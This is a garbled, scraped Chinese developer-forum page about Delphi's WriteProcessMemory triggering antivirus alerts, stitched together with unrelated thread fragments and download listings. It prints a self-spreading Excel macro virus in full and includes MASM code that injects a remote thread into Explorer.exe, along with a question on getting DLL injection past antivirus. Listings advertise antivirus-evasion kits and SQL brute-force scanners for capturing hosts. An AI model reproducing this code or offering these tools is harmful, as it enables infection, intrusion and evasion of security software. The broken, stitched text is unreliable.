Delphi 7的WriteProcessMemory被小红伞报毒?! [问题点数:20分,结帖人liups]

Bbs4
本版专家分:1377
结帖率 96.55%
Bbs8
本版专家分:40446
Blank
红花 2008年8月 Delphi大版内专家分月排行榜第一
Blank
黄花 2009年10月 Delphi大版内专家分月排行榜第二
2009年8月 Delphi大版内专家分月排行榜第二
2008年9月 Delphi大版内专家分月排行榜第二
Blank
蓝花 2008年7月 Delphi大版内专家分月排行榜第三
2008年6月 Delphi大版内专家分月排行榜第三
Bbs4
本版专家分:1377
Bbs7
本版专家分:27046
Blank
红花 2008年9月 Delphi大版内专家分月排行榜第一
2007年2月 Delphi大版内专家分月排行榜第一
Blank
黄花 2008年4月 Delphi大版内专家分月排行榜第二
Blank
蓝花 2007年4月 Delphi大版内专家分月排行榜第三
2007年3月 Delphi大版内专家分月排行榜第三
Bbs8
本版专家分:40446
Blank
红花 2008年8月 Delphi大版内专家分月排行榜第一
Blank
黄花 2009年10月 Delphi大版内专家分月排行榜第二
2009年8月 Delphi大版内专家分月排行榜第二
2008年9月 Delphi大版内专家分月排行榜第二
Blank
蓝花 2008年7月 Delphi大版内专家分月排行榜第三
2008年6月 Delphi大版内专家分月排行榜第三
Bbs4
本版专家分:1377
使用WriteProcessMemory 被拒绝访问
正在编写一个DLL注入的程序,但是调用<em>WriteProcessMemory</em>的时候错误,返回错误为拒绝访问,不知道是不是权限不够,后来我关闭了杀<em>毒</em>软件,该程序就可以正常运行了,但是不能每次都让客户关闭杀<em>毒</em>软件了再运行吧?请问,如果不关闭杀<em>毒</em>软件如何让该函数正确执行呢~~rn并非用于不良目的,仅仅是为了学习,请高手指点
上传组件
[code=html]rnrnrnrnrn 文件上传rn rn rnrn rnrnrnrnrn rnrnrnrnrn rnrnrnrn)rnrnEnd Subrnrn[/code]rn安全狗提示为ASP木马,各位大侠们看看哪有问题,谢谢
xe6 编译
每次编译,360都<em>报</em><em>毒</em>: heur/qvm41.1.malware.gen rnrn怀疑是<em>Delphi</em>梦魇,如何确认SysConst.dcu是否被感染?rn
js问题
rnrnjs-rn为什么杀<em>毒</em>软件对js<em>报</em><em>毒</em>? ,大家有什么好的办法吗?
文件打包
用 res 将多个文件打包到 exe 里面,会被认为是病<em>毒</em>?
delphi writeprocessmemory 参数
function sun():integer; //我的函数rnVAR SitNum :DWORD;rn GameH:HWND; //定义进程窗口句柄rn PidGame:DWORD; //定义进程IDrn readByte:DWORD; //实际读取字节rn Gamehprocess: THandle; //可以理解为DWord,也就是非负数的整数类型 定义进程句柄rnbeginrna:=chr(235);rn GameH:=FindWindow('MainWindow',nil); //获取游戏窗口句柄rn GetWindowThreadProcessId(GameH,PidGame) ; //获取进程IDrn Gamehprocess:=OpenProcess(PROCESS_VM_READ or PROCESS_VM_WRITE,false,PidGame); //获取进程句柄rn Readprocessmemory(gamehProcess, Pointer($<em>7</em><em>7</em>94F8),@SitNum,4,readByte); //读出内存值rn ReadProcessMemory(Gamehprocess,Pointer(SitNum+$868),@SitNum,4,ReadByte); //第一个偏移rn ReadProcessMemory(Gamehprocess,Pointer(SitNum+$55<em>7</em>8),@SitNum,4,ReadByte);rnrn rn form1.edit1.Text:=inttostr(SitNum);rnend;rn rn我可以读到内存值.然后放到EDIT里面..但是我现在想写入值.改变他.怎么做?rnrn网上例子我找了很久了.但是参数完全看不懂什么意思..
delphi动态调用WriteProcessMemory
delphi<em>7</em>动态调用kernel32.dll的<em>WriteProcessMemory</em>函数应该怎么写?rnrn我知道delphi<em>7</em>有封装 - -,我只是想要个例子rnrn[code=<em>Delphi</em>(Pascal)]<em>WriteProcessMemory</em>(hws,Pointer($00<em>7</em>41C48),@fly1,4,null)[/code]rnrn例如上面那个代码用动态调用要怎么写?就是LoadLibrary加载了DLL GetProcAddress使用函数
DelphiWriteProcessMemory问题
在<em>Delphi</em>下用writeprocessmemory能不能写入字节集数据呢?rn能的话,给个例子
减小软件的
有哪些技术可以减小一款软件的<em>报</em><em>毒</em>率,如被360<em>报</em><em>毒</em>?加了数字签名还<em>报</em><em>毒</em>怎么办?
vb6做的Dll
[img=https://img-bbs.csdn.net/upload/20140<em>7</em>/20/1405863029_<em>7</em>64363.jpg][/img]rn[img=https://img-bbs.csdn.net/upload/20140<em>7</em>/20/1405863086_969836.jpg][/img]rn我用vb6.0自己做的dll,大部分引用的是api,vbs,vb自带的命令编写的主要功能有文件操作,窗口操作,加解密(引用大神写的AES,DES,SHA,CRC,RC4等网上能找到的代码), 不知道为什么<em>报</em>这几个病<em>毒</em>,,测试了下把加解密那部分去掉,就少<em>报</em>一个<em>毒</em>,(Trojan-Dropper.VB.3 (paranoid heuristics)),请懂的看看能不能帮我解决<em>报</em><em>毒</em>问题,或者指点下哪几个容易<em>报</em><em>毒</em>的rnrn引用的 Api 有 user32 kernel32 Shell32 RasApi32.DLL gdi32 advapi32 comdlg32.dll
屏蔽金山源代码
可以屏蔽金山<em>报</em><em>毒</em>与腾讯<em>报</em><em>毒</em> php格式,需服务器有php环境
软件的解决方案与注意事项
DotfuscatorPro_4.9可以防止你的.NET软件被反编译,可以在一定程度上防止你的软件被反编译。现在很多软件都有被反编译的现象,虽然不能做到百分百的防范,但是你至少可以先做些技术上的处理,至少能挡住许多小白。
管理员注意了:csdn被挂马了,我的电脑已经
//源文件的第一句,管 rnrnrn rn rn CSDN_专家门诊_发表新贴子rn rn rn
网站优化:网站被K,网站申诉通道
开发十年,就只剩下这套Java开发体系了 &amp;gt;&amp;gt;&amp;gt;    ...
delphi中的WriteProcessMemory与windows api的WriteProcessMemory有什么区别?
问题如题:delphi help中的<em>WriteProcessMemory</em>与windows sdk 中windows api的<em>WriteProcessMemory</em>有什么区别? 两者之间的区别是参数不同,而在delphi help 中使用<em>WriteProcessMemory</em>时<em>报</em>错,不知道二者是什么关系,请各位指教!!!
!!!!!!!!!~~~~~~~~~~
<em>毒</em>杀不掉啊!杀了后说重新启动rn可启动了还是有啊!!!!!!!!rn我用的是金山2002钻石会员版啊!!!!!!!!rn
编译文件被感染,生成软件,delphi朋友请查看自己的编译器!
卡巴工程师的回答!rnrnhttp://bbs.kaspersky.com.cn/viewthread.php?tid=312849&highlight=delphirnrn8.16号卡巴更新后,delphi生成空文件也被<em>报</em><em>毒</em>!rnrn大家检查下安装目录rnlib下的SysConst.dcu文件,大小,如果为1<em>7</em>KB,被感染了。目前5个杀<em>毒</em>,瑞星,卡巴,AVG等检测到了病<em>毒</em>!rnrnSysConst.dcu正式大小应该为12KB不到点点。lib/debug目录下有SysConst.dcu,SysConst.bak(改名回来)文件,替换回来就可以恢复正常!rnrn我也不知道我是怎么感染的。rnrn卡饭朋友的疑问rnhttp://www.kpfans.com/bbs/thread-539<em>7</em>60-1-1.htmlrnhttp://www.unpack.cn/viewthread.php?tid=39339rnrn基本都是8.16号后的问题。并非误<em>报</em>!rn替换回正规SysConst.dcu问题解决了!大家查看下巴。免得自己写的东西被人说病<em>毒</em>。rn可能是某个控件带来的问题!
delphi的datetimepicker控件,被360木马
360真是不打算让天下程序员活了啊,用XE4写的一个软件,只要一点时间控件,360马上就跳出警告框<em>报</em>木马,神经病
!!!
哪里有杀winfile的工具
德国小红伞AntiVir Personal Edition 7 6.36.00.177
德国小<em>红伞</em>AntiVir Personal Edition <em>7</em> 6.36.00.1<em>7</em><em>7</em>
搜狐博文评论自动机(无
自动发,方便好用,不用添加导入;不用复杂操作,自动添加发送。只需轻点鼠标就可完成。内附使用教程。(<em>报</em><em>毒</em>,无<em>毒</em>)
元素马2.4.1(防止密码
元素马2.4.1(防止<em>报</em><em>毒</em>密码
防止 漂亮的资源跳转页
漂亮的资源跳转页,喜欢的朋友可以拿来,跳转例子:http://你的域名/go.php?url=要跳转的域名
网易博文评论自动机(无
自动发,方便好用,不用添加导入;不用复杂操作,自动添加发送。只需轻点鼠标就可完成。内附使用教程。(<em>报</em><em>毒</em>,无<em>毒</em>)
使用CreateProcess() 360问题
[size=14px]小弟在公司开发一个公司产品的下载器, 下载完之后有时需要后台静默安装,rn这样小弟是用CreateProcess() 来实现静默安装的, 程序编译后, 360果断<em>报</em><em>毒</em>, 截图如下:rn[/size][code=C/C++]rn//动态调用API: CreateProgress();rn MyCreateProcess Myfunc = NULL;rn Myfunc = (MyCreateProcess)GetProcAddress(g_hDll_ker, "CreateProcessA");rn if (Myfunc == NULL)rn rn return false;rn rnrn Myfunc(NULL, szExecutePath, NULL, NULL, NULL, NULL, NULL, NULL, &startInfo, &processInfo);[/code]
求助---------编译程序后就!!!
生成的程序卡巴就<em>报</em><em>毒</em>rnrn已删除: 木马程序 Trojan-Banker.Win32.Banker.csb 文件: D:\STP\STP.exernrn但瓣建一个空白项目编译可以,是不是我的代码有<em>毒</em>啊?rnrn但是我之前一直是这样的代码,只是这几天换装WIN<em>7</em>后,又装回XP而已rnrnSysConst.dcu文件也只有12K而已rnrn
delphi 请教writeprocessmemory函数怎么用
rnh1:= OpenProcess(PROCESS_ALL_ACCESS, false, pid);rnrn<em>WriteProcessMemory</em>(h1,Ptr($01012F60),PChar(Chr(1000)),4,0);rnh1是进程句柄 改内存$01012F60值为1000rnrn运行以后内存值没变化 rn请问是哪里原因 高手指点下 rnrn没学过delphi依葫芦画瓢来的 高手莫笑 呵呵~~rnrnrnrn
易语言免杀360
免杀360,易语言编写的程序不会被360<em>报</em><em>毒</em>
360对于mysql问题
c:\Windows\amd.dll rnc:\Windows\system32\amd.dllrn请教各位高手 有没有解决办法
.net的硬伤,加密了就
我们团队开发了一款 基于P2P技术的交互产品。rnrn开发完毕后肯定加密,不然被反编译出来 就是几秒钟的事情。rnrn后来用了混淆技术。这个部分不是我的写的。其他伙伴写的。rnrn不加密前没事, 混淆以后,360拼命的<em>报</em><em>毒</em>, 某些杀<em>毒</em>也<em>报</em>。rnrn后来我就尝试再加壳看看,不用说了,现在的杀<em>毒</em>软件只要你加壳,他查看不到底层数据。一律<em>报</em><em>毒</em>,加壳一律爆菊。rnrn请大家给我一个方案,如何加密又不容易被杀<em>毒</em>软件误<em>报</em>。我觉得加壳是行不通的!
自己打包的程序,杀软件,怎么搞?
本来自己写的小程序,打包发布,360特么居然<em>报</em><em>毒</em>,在安装的时候就给阻止了。添加本地信任肯定不是解决方法,总不能在客户的电脑上也要人家添加信任吧,客户可没有必要相信你。退出360也不是解决办法。我要的效果是,能像个普通的软件一样,能直接在客户电脑上安装使用的。不需要添加信任,不需要关闭杀<em>毒</em>软件的。请问需要什么打包软件或者其他工具的吗?
求大神指导,金山为何
刚学C++,网络教室上要提交程序,自己遍了一个,金山<em>毒</em>霸<em>报</em><em>毒</em>,不明其原因,希望高人帮忙,谢谢。rn(上传过文件,金山说不是误<em>报</em>)rn源码如下:rn#includernusing namespace std;rnclass Datarnpublic:rn int year,month,day;rn Data(int i,int j,int k)rn rn year=i;rn month=j;rn day=k;rn rn int GetDay();rn int GetMonth();rn int GetYear();rn void ShowData();rn ;rn void Data::ShowData() rn cout<>i>>j>>k;rn Data d(i,j,k);rn d.ShowData();rn
为什么一用sqlserver的jar包,就
我装了N遍系统,换了几个jar包,把sql也换了,myeclipse也升级成9.0,只要连接到数据库,就<em>报</em><em>毒</em>,这是怎么回事啊,我装了5遍系统了。。。。(sqlserver.exe和hex1.exe的病<em>毒</em>,轮番<em>报</em><em>毒</em>,隔几分钟就<em>报</em><em>毒</em>),单独使用myeclipse和sql就蛮好
常见的域名解封方法
1、301跳转破微信封域名,原来这个技术是:域名批量泛解析生成N个二级域名,域名无限替换跳转;并且网页入口、落地页、转发到朋友圈的域名都不同,举<em>报</em>也可以防一下,但是很快这个技术就死掉了。 2、仿举<em>报</em>页面,就是在网页上自己做一个举<em>报</em>的按钮,举<em>报</em>页面也是仿微信举<em>报</em>选项等,不过只能解决普通小白用户的举<em>报</em>。目前可恶的同行开发了,模拟人工举<em>报</em>的软件,走的微信举<em>报</em>流程,防不胜防。 3、租防封域名,这个域名
秒解除网址直接打开
在网址的后面添加?_wv=1即可 如:http://www.xtylw.vip 在后面加上http://www.xtylw.vip?_wv=1即可
邮件全自动群发器(,无
自动添加,不需导入,只需鼠标点击,完美操作。内附教程,(<em>报</em><em>毒</em>,无<em>毒</em>)。
新浪博文评论自动机(,无
自动发,方便好用,不用添加导入;不用复杂操作,自动添加发送。只需轻点鼠标就可完成。内附使用教程。(<em>报</em><em>毒</em>,无<em>毒</em>)
Android APP和排查解决
APP遇到操作一些较高的用户权限,比如删除短信,定时开关机这些,在用户手机安装应用时会提示用户给用户。 但是最近一个项目出现了<em>报</em><em>毒</em>的现象,被百度手机管家定位为木马应用,原因是添加了发送和删除短信的权限。 于是在发送短信的时候,添加了弹框,提示用户会发送一条短信,解决的问题。 安全管家或者检测中心一般会检测你的部分代码块时候匹配木马数据库,或者请求协议,用户操作权限来判断是否
谁能解决webbrowser控件的问题?
如题,不知道是360故意刁难还是说这个控件确实有问题?应该如何解决?请大侠指点
群里xls的宏,360
rnAttribute VBA_ModuleType=VBAModulernSub StartUprnSub auto_open()rnOn Error Resume NextrnIf ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" ThenrnApplication.ScreenUpdating = FalsernThisWorkbook.Sheets("StartUp").CopyrnActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")rnn$ = ActiveWorkbook.NamernActiveWindow.Visible = FalsernWorkbooks("StartUp.xls").SavernWorkbooks(n$).Close (False)rnEnd IfrnApplication.OnSheetActivate = "StartUp.xls!cop"rnApplication.OnKey "%F11", "StartUp.xls!escape"rnApplication.OnKey "%F8", "StartUp.xls!escape"rnEnd SubrnSub cop()rnOn Error Resume NextrnIf ActiveWorkbook.Sheets(1).Name <> "StartUp" ThenrnApplication.ScreenUpdating = Falsernn$ = ActiveSheet.NamernWorkbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)rnSheets(n$).SelectrnEnd IfrnEnd SubrnSub escape()rnOn Error Resume NextrnApplication.OnSheetActivate = "StartUp.xls!back"rnApplication.OnKey "%F11"rnApplication.OnKey "%F8"rnApplication.SendKeys "%F11"rnApplication.SendKeys "%F8"rnFor Each book In WorkbooksrnApplication.DisplayAlerts = FalsernIf book <> "StartUp.xls" Then book.Sheets("StartUp").DeleternNextrnFor Each book In WorkbooksrnIf book.Name = "StartUp.xls" Thenrnbook.ClosernEnd IfrnNextrnEnd SubrnSub back()rnOn Error Resume NextrnApplication.OnKey "%F8", "StartUp.xls!escape"rnApplication.OnKey "%F11", "StartUp.xls!escape"rnApplication.OnSheetActivate = "StartUp.xls!cop"rnApplication.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"rnWorkbooks.Open Application.StartupPath & "\StartUp.xls"rnEnd SubrnrnEnd Sub
delphi 7
各位大哥 有人用过delphi <em>7</em> 吗 为什么我在安装interbase 6.5时老是<em>报</em>错rn当装到401comupd.exe时<em>报</em>错指定的文件或目录不能写。换了几台机器都一样,希望大家帮忙
请问我最近机器总是在上网时出现对话框:好像是什么信使信息,用文字告知那个网站怎么怎么好。。。。。。。好像是开了QQ后才出现的。rn然后恶梦出现了:在执行所有.exe文件时系统告知:windows设法关闭xx.exe(xx是我开的可执行文件的名称)。rn不知如何是好啊!请大家帮帮忙。
我是用mirc聊天,在安装前用金山<em>毒</em>霸查<em>毒</em>不会发现病<em>毒</em>,但是安装好后就会扫描到1个病<em>毒</em>,换了另1个版本的mirc也是一样,请各位高手多多指教
WriteProcessMemory的问题
rnReadProcessMemory ProcessID, ByVal eax + pn * 4, tmp1, 4, 0rnReadProcessMemory ProcessID, ByVal tmp1 + 4, VarPtr(tmp2), 4, 0rnReadProcessMemory ProcessID, ByVal tmp2 + &H110, VarPtr(tmp3), 4, 0 rnIf tmp3 = 28 Then <em>WriteProcessMemory</em> ProcessID, ByVal eax + pn * 4, 0, 4, 0&rnrn<em>WriteProcessMemory</em> ProcessID, ByVal eax + pn * 4, 0, 4, 0&rn是为了把(eax + pn * 4)这个地址的内容写成空白的,可是执行完这句话,我操作的程序就<em>报</em>错强行退出了!不知道什么原因,跪求答案!rn
Hook WriteProcessMemory
刚学习APIHOOK。下了一个示例,是HOOK MessageBox,Detour版本的。rn它是直接修改参数的:rn[code=C/C++]rnint nResult=CopyMessageBoxA(hWnd,"Haha,Detours Hooked!",lpCaption,uType); //call origin functionrn[/code]rnrn请问如果我要Hook <em>WriteProcessMemory</em> 得到它写入的地址跟内容 要怎么做呢?rn例如要把HOOK到的地址跟内容保存到控件文本上要怎么做?
WriteProcessMemory不成功
BOOL ret = <em>WriteProcessMemory</em>(hProcess,(char *)GetModuleHandle(0) + buff,&b,4,0);rnif(ret==0)rnrn MessageBox(0,"...",0,0);rnrnrn这个 GetModuleHandle(0) + buff 是程序中导入表的 FirstThunk 部分,rn为什么这个部分的内存没办法写入数据?而其他地方的都可以。比如 GetModuleHandle(0) + 0xEF0 就没问题。rnrn我试过用 VirtualProtect 来改变这个内存的属性也失败了。rnrnBOOL rtn = VirtualProtect((char *)GetModuleHandle(0) + buf,4,PAGE_EXECUTE_READWRITE,&old);rnif(rtn==0)rnrn MessageBox(0,"...",0,0);rnrnrnrn这部分的内存应该怎么修改?
vb6写了个正当程序老是被360,百思不得其解。如何知道是其中哪段代码可能被呢?
vb6写了个正当程序老是被360<em>报</em><em>毒</em>,百思不得其解。如何知道是其中哪段代码可能被<em>报</em><em>毒</em>呢?rn有没有相关的可以自动帮忙检测提示的软件?
1521VIP最终版
<em>毒</em><em>毒</em>1521VIP最终版<em>毒</em><em>毒</em>1521VIP最终版
WriteProcessMemory数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rn; Sample code for < Win32ASM Programming 2nd Edition>rn; by 罗云彬, http://asm.yeah.netrn;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rn; RemoteThread.asmrn; 向 Explorer.exe 进程中嵌入一段远程执行的代码rn;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rn; 使用 nmake 或下列命令进行编译和链接:rn; ml /c /coff RemoteThread.asmrn; rc RemoteThread.rcrn; Link /subsystem:windows RemoteThread.obj RemoteThread.resrn;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rn .386rn .model flat, stdcallrn option casemap :nonern;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rn; Include 文件定义rn;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rninclude windows.incrninclude user32.incrnincludelib user32.librninclude kernel32.incrnincludelib kernel32.librninclude Macro.incrn;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rn; 数据段rn;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rn .data?rnlpLoadLibrary dd ?rnlpGetProcAddress dd ?rnlpGetModuleHandle dd ?rndwProcessID dd ?rndwThreadID dd ?rnhProcess dd ?rnlpRemoteCode dd ?rnrn .constrnszErrOpen db '无法打开远程线程!',0rnszDesktopClass db 'Progman',0rnszDesktopWindow db 'Program Manager',0rnszDllKernel db 'Kernel32.dll',0rnszLoadLibrary db 'LoadLibraryA',0rnszGetProcAddress db 'GetProcAddress',0rnszGetModuleHandle db 'GetModuleHandleA',0rn;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rn .codern;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rnrninclude RemoteCode.asmrnrnstart:rn invoke GetModuleHandle,addr szDllKernelrn mov ebx,eaxrn invoke GetProcAddress,ebx,offset szLoadLibraryrn mov lpLoadLibrary,eaxrn invoke GetProcAddress,ebx,offset szGetProcAddressrn mov lpGetProcAddress,eaxrn invoke GetProcAddress,ebx,offset szGetModuleHandlern mov lpGetModuleHandle,eaxrn;********************************************************************rn; 查找文件管理器窗口并获取进程ID,然后打开进程rn;********************************************************************rn invoke FindWindow,addr szDesktopClass,addr szDesktopWindowrn invoke GetWindowThreadProcessId,eax,offset dwProcessIDrn mov dwThreadID,eaxrn invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or \rn PROCESS_VM_WRITE,FALSE,dwProcessIDrn .if eaxrn mov hProcess,eaxrn;********************************************************************rn; 在进程中分配空间并将执行代码拷贝过去,然后创建一个远程线程rn;********************************************************************rn invoke VirtualAllocEx,hProcess,NULL,REMOTE_CODE_LENGTH,MEM_COMMIT,PAGE_EXECUTE_READWRITErn .if eaxrn mov lpRemoteCode,eaxrn [color=#FF0000]invoke <em>WriteProcessMemory</em>,hProcess,lpRemoteCode,\rn offset REMOTE_CODE_START,REMOTE_CODE_LENGTH,NULLrn invoke <em>WriteProcessMemory</em>,hProcess,lpRemoteCode,\rn offset lpLoadLibrary,sizeof dword * 3,NULL[/color] mov eax,lpRemoteCodern add eax,offset _RemoteThread - offset REMOTE_CODE_STARTrn invoke CreateRemoteThread,hProcess,NULL,0,eax,0,0,NULLrn invoke CloseHandle,eaxrn .endifrn invoke CloseHandle,hProcessrn .elsern invoke MessageBox,NULL,addr szErrOpen,NULL,MB_OK or MB_ICONWARNINGrn .endifrn invoke ExitProcess,NULLrn;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rn end startrn我想问的是主要红色<em>WriteProcessMemory</em>这块,第一次<em>WriteProcessMemory</em>加载的是远程代码,明白,rn第二次<em>WriteProcessMemory</em>写入的地方是同一个地址,这不是会覆盖前面的内容吗?rn书上说[img=http://www.milan520.com/huang/写入内存.jpg][/img]rn“并不将loadlibry三个函数存放到远程代码一起写入的原因”这个原因看不明白,知道的朋友说下哈。谢谢rn还有怎么第二个<em>WriteProcessMemory</em>就是写在数据段了呢?他与第一个写入的地址是同一个地址, 不会覆盖吗?rn
红伞备份恢复工具 delphi写的 附带源码
小<em>红伞</em>备份恢复工具 delphi写的 附带源码 小<em>红伞</em>病<em>毒</em>库 用户设置的备份恢复
!
我的机子老出现(KERNELSYS32。EXE---没有软盘,驱动器中没有软盘,请在驱动器A:中插入软盘)的提示。rn我用金山<em>毒</em>霸查这个文件被有<em>毒</em>,为TOP19,让重启动,但重起动也没用。rn我该如何去做?rnrn
!!!!
我用的是EXCEL表格rn我表格打不开了,说软件有问题得重装,然后我想先把硬盘里的东西备份,可是文件夹的复制,粘贴不行rn最后把C盘格了,重装2000不行,装了98情况好转。,但是据说病<em>毒</em>还是没有彻底杀掉rn我同事的电脑和我一样,情况比我好点,就是重启一下就可以打开OFFICErnrnrn请帮忙这是什么<em>毒</em>?怎么杀?
你好你好你好!!!!!
最近,单位的网站中标了,应该是五<em>毒</em>具全了,一打开文件夹就会发现很多以rn.emlrn.nwsrn.dbrn扩展名的一些病<em>毒</em>文件,但是用了很多专杀工具都没办法清除,比如:求职信。冲击波。新欢乐时光。尼达姆,蠕虫王的专杀工具都不行,只能手工清楚,但是自动复制的病<em>毒</em>文件数目太多,所以机器很容易死机!也不是个好办法!求救,现在电脑的速度慢的是在然人窝火拉!!!!!!!
writeprocessmemory的问题
WritePrecessMemory(xx,yy,zz,written)函数里的第2个参数yy,是什么意思?是被改写的函数的地址,还是指向被改写函数的指针?
红伞卸载工具卸载小红伞必用
小<em>红伞</em>专用惺惺惜惺惺发奋读书撒巩固国防费房单位房改房呵呵
antivir_workstation(小红伞)
来自德国的防<em>毒</em>软件,效果自己试试吧!我试验的结果比卡巴强!
红伞许可证
2013年1月15日可以用,久了又会被封了
红伞软件
小<em>红伞</em>杀<em>毒</em>软件
红伞iphone
小<em>红伞</em>iphone
delphi 7[Fatal Error] Required package 'fc4000v7' not found
delphi <em>7</em>中,编译时总是<em>报</em>[Fatal Error] Required package 'fc4000v<em>7</em>' not found,不知道是怎么回事.有哪位也遇到过此问题的,如何解决的,谢谢.rn
红伞卸载方法-教你完全卸载小红伞
小<em>红伞</em>卸载方法-教你完全卸载小<em>红伞</em>,包括一个doc文档和会使用到的卸载工具
红伞防火墙
小<em>红伞</em>防火墙,个人感觉比国内的防火墙要好,主要,安装体积小,不浪费系统资源,无广告,无捆绑安装软件
红伞激活码
小<em>红伞</em>激活码 至201310.26
红伞辅助工具
基本功能: 去除广告:去除F版更新过程中弹出的升级广告 自动病<em>毒</em>处理:为F版增加自动处理病<em>毒</em>功能(拒绝执行) 启动屏设置:取消/开启 开机启动<em>红伞</em>启动屏,修复<em>红伞</em>托盘图标. 配置文件设置:备份还原<em>红伞</em>设置(*还原设置时需关闭<em>红伞</em>文件保护) VDF备份:备份<em>红伞</em>本地病<em>毒</em>库(VDF) VDF下载:下载<em>红伞</em>最新VDF离线包 KEY申请:自动申请的p版key有效期为31天、S版为92天
最新小红伞
tinyumbrella-<em>7</em>.02.01a.exe
1433VIP版
1433<em>毒</em><em>毒</em>VIP版560元一套。现在免费送上》是本人网上收到的
红伞卸载程序,小红伞卸载程序
可用于小<em>红伞</em>的卸载,解除你<em>红伞</em>卸载不了的烦恼。
keyx小红伞
key很好用哦,记得下载,有效期1年,试试看吧
红伞快捷方式
一种用于描述Web资源的标记语言。RDF是一个处理元数据的XML(标准通用标记语言的子集)应用,所谓元数据
1521VIP最终版.rar
<em>毒</em><em>毒</em>1521最终版,我一个黑友在服务器上拿的。 分享给大家。支持多线程,多用户名、密码检测。 我今天一上午抓到205台。。哈哈。 祝大家肉鸡多多。。
红伞key
这是一个小<em>红伞</em>key S版的,大家分享吧
德国小红伞
德国小<em>红伞</em>是一款很好的杀<em>毒</em>软件,它能够杀死其他杀<em>毒</em>软件不能解决的问题,你值得拥有
红伞V9_9.0.rar
小<em>红伞</em>V9_9.0.rar小<em>红伞</em>V9_9.0.rar小<em>红伞</em>V9_9.0.rar小<em>红伞</em>V9_9.0.rar小<em>红伞</em>V9_9.0.rar
红伞下载
小<em>红伞</em>(JP版)下载 ,记住是JP版哦。。。好用
红伞2013
激活码2013p版
7 整除的数
法 1用 <em>7</em> 作除数时,10 的整数次方的余数如下: 10010^0:1 10110^1:3 10210^2:2 10310^3:6 10410^4:4 10510^5:5 10610^6:1 10<em>7</em>10^<em>7</em>:3 10810^8:2 10910^9:6 判断方法:把每一位数字乘上该位所对应的余数,如果它们加起来等于 <em>7</em> 的整数倍,就肯定能被 <em>7</em> 整除。如: 4312 ⇒ 4*6 + 3*2 + 1*
牛客网 被7整除
题目描述 小萌非常喜欢能被<em>7</em>整除的数字,比如<em>7</em>,21,121996,等等。有一天他得到了n个正整数,她想用这些数制造出更多的能够被<em>7</em>整除的数。于是她从这n个数中选出两个数,然后将一个数写在另一个数的前面,以此得到一个新的数。按这种方法她一共可以得到个数,她想知道在这些数中,有多少个是能被<em>7</em>整除的。 输入描述: 第一行包含一个整数n。2 ≤n≤105 第二行包含n个正整数ai。...
asp 博客(毕业设计)下载
c#,asp个人博客设计源码,详细下载可以运行,功能齐全 相关下载链接:[url=//download.csdn.net/download/sunqi/3343749?utm_source=bbsseo]//download.csdn.net/download/sunqi/3343749?utm_source=bbsseo[/url]
Iphone开发系列源码——公交线路查询项目完整源码下载
Iphone开发系列源码——公交线路查询项目完整源码Iphone开发系列源码——公交线路查询项目完整源码Iphone开发系列源码——公交线路查询项目完整源码Iphone开发系列源码——公交线路查询项目完整源码Iphone开发系列源码——公交线路查询项目完整源码Iphone开发系列源码——公交线路查询项目完整源码Iphone开发系列源码——公交线路查询项目完整源码Iphone开发系列源码——公交线路查询项目完整源码Iphone开发系列源码——公交线路查询项目完整源码Iphone开发系列源码——公交线路查询项目完整源码Iphone开发系列源码——公交线路查询项目完整源码Iphone开发系列源码—— 相关下载链接:[url=//download.csdn.net/download/jone33/3521394?utm_source=bbsseo]//download.csdn.net/download/jone33/3521394?utm_source=bbsseo[/url]
C#语音报号下载
C#语音报号源码,B/S、C/S均可参照此代码,逻辑清晰,一看就懂 相关下载链接:[url=//download.csdn.net/download/zjl523357813/5352933?utm_source=bbsseo]//download.csdn.net/download/zjl523357813/5352933?utm_source=bbsseo[/url]
相关热词 c# 线程结束时执行 c# kb mb 图片 c# 替换第几位字符 c#项目决定成败 c# 与matlab c# xml缩进 c#传感器基础 c#操作wps c# md5使用方法 c# 引用父窗口的组件
我们是很有底线的